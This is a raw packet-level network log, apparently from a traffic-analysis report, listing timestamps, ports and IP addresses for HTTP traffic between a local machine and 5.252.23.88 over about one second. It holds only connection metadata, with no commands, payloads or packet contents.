Mar 29, 2022 06:51:49.983136892 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.983154058 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.983172894 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.983189106 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.983208895 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.983227015 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.983230114 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.983239889 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.983257055 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.983258963 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.983263969 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.983269930 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.983275890 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.983280897 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.983280897 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.983285904 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.983292103 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.983303070 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.983324051 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.983341932 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.983361006 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.983381033 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.983397007 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.983416080 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.983433008 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.983449936 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.983468056 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.983484030 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.983501911 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.983504057 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.983520985 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.983536005 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.983537912 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.983555079 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.983572006 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.983589888 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.983607054 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.983619928 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.983625889 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.983630896 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.983637094 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.983642101 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.983647108 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.983647108 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.983654976 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.983659983 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.983664036 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.983664989 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.983670950 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.983680010 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.983696938 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.983716011 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.983733892 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.983750105 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.983767033 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.983783960 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.983800888 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.983814001 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.983818054 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.983834982 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.983840942 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.983849049 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.983855009 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.983856916 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.983864069 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.983872890 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.983880043 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.983891964 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.983916998 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.983936071 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.983952045 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.983954906 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.983963013 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.983973980 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.983998060 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.984014988 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.984030008 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.984031916 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.984040022 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.984045982 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.984052896 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.984071016 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.984088898 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.984107018 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.984124899 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.984142065 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.984154940 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.984162092 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.984164953 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.984180927 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.984199047 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.984215975 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.984217882 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.984225035 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.984235048 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.984249115 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.984252930 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.984271049 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.984289885 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:49.984306097 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.984316111 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:49.984348059 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.013988018 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.014030933 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.014055967 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.014080048 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.014106989 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.014131069 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.014153957 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.014189959 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.014198065 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.014225006 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.014229059 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.014235973 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.014241934 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.014250994 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.014260054 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.014277935 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.014301062 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.014318943 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.014327049 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.014328003 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.014352083 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.014357090 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.014377117 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.014378071 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.014403105 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.014403105 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.014429092 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.014446020 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.014455080 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.014461994 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.014482975 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.014486074 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.014511108 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.014540911 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.014550924 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.014560938 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.014585972 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.014611006 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.014631033 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.014636993 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.014642000 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.014648914 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.014662981 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.014678001 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.014688969 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.014714956 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.014727116 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.014738083 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.014739990 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.014744997 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.014766932 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.014776945 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.014794111 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.014817953 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.014830112 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.014837980 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.014842987 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.014869928 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.014889956 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.014894962 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.014903069 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.014914036 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.014923096 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.014950991 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.014957905 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.014976025 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.014976025 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.014985085 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.015005112 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.015012980 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.015031099 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.015055895 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.015079021 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.015094995 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.015100002 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.015103102 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.015131950 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.015136003 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.015162945 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.015189886 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.015192032 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.015198946 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.015204906 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.015221119 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.015238047 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.015249968 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.015279055 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.015309095 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.015321016 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.015335083 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.015338898 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.015367985 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.015413046 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.015425920 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.015435934 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.015461922 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.015491962 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.015520096 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.015559912 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.015588999 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.015623093 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.015722036 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.015738964 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.015779018 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.015803099 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.015806913 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.015824080 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.015830994 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.015836000 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.015837908 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.015841007 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.015846014 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.015851021 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.015856028 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.015870094 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.015899897 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.015974998 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.016016960 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.016031981 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.016062021 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.016062021 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.016094923 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.016114950 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.016124964 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.016124964 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.016139984 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.016205072 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.016216993 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.016248941 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.016277075 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.016304970 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.016330957 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.016346931 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.016362906 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.016374111 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.016392946 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.016485929 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.016515970 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.016546011 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.016565084 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.016575098 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.016576052 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.016590118 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.016608000 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.016639948 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.016643047 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.016674042 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.016678095 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.016696930 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.016705036 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.016736031 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.016763926 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.016791105 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.016813993 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.016822100 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.016846895 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.016851902 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.016855955 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.016865015 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.016871929 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.016880989 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.016882896 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.016964912 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.016985893 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.016993999 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.017107964 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.017132044 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.017160892 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.017188072 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.017210960 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.017240047 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.017241955 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.017256975 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.017266989 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.017271042 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.017283916 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.017298937 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.017327070 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.017357111 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.017358065 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.017386913 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.017411947 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.017421007 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.017426014 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.017436981 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.017493010 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.017501116 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.132191896 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.132621050 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.867424011 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.897937059 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.897973061 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.898030996 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.898066044 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.898102999 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.898113966 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.898144960 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.898185015 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.898211002 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.898245096 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.898289919 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.898294926 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.898332119 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.898350000 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.898396015 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.898443937 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.898463964 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.898484945 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.898515940 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.898529053 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.898552895 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.898566008 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.898581028 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.898607969 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.898664951 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.898699045 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.898725033 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.898751974 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.898776054 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.898801088 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.898824930 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.898839951 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.898849964 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.898896933 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.898900986 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.898952007 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.898957014 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.898987055 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.899005890 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:50.899027109 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:50.899040937 CEST	49793	80	192.168.2.7	5.252.23.88
